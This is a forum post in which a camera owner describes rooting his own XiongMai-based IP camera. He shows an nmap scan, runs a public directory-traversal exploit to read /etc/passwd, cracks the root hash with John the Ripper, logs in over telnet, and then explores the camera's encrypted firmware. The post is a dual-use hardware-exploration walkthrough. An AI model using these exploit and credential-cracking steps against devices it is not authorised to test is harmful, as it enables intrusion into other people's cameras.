News:

Re-organized the forum to more cleanly delineate the development section, as the end user support side appears to have taken a life of its own!

Author Topic: How I got root on my camera  (Read 671 times)

  • No avatar
  • *
July 02, 2017, 04:22:42 pm
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code: [Select]
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code: [Select]
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code: [Select]
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code: [Select]
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?